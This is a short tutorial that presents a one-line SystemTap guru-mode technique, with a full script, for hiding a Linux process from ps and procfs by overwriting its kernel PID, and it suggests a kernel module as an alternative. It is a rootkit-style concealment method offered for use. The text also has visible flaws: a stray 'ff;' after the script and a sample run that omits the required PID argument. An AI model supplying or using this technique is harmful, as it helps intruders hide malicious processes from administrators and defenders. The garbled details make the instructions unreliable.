Hide a Linux Process with One Line of SystemTap Code

Many people ask how to hide a Linux process. Instead of complex kernel hooks or user‑space tricks, you can achieve a simple concealment by modifying the process's PID.

The technique involves changing the PID to an unregistered value, making the process invisible in procfs and undetectable by ps. target->pid = 0x7fffffff; Full SystemTap script:

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
    struct task_struct *target;

    target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
    target->pid = 0x7fffffff;
%}

probe begin
{
    pid = $1
    hide(pid);
    exit();
}
ff;

Run the script:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

Detect all executable binaries of visible processes:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do
    ls -l /proc/$pid/exe;
 done

Because the chosen PID (e.g., 0x7fffffff) has never been registered, it does not appear in procfs, so standard tools like ps cannot list it.

If you prefer not to use SystemTap, you can write a custom Linux kernel module that directly sets target->pid to the desired value and returns -1, which is even simpler than various hook methods.

In short, when a task is created, its PID registers a procfs directory entry. The procfs traversal uses the PID as a key to locate the task. Assigning an unregistered PID makes the entry invisible.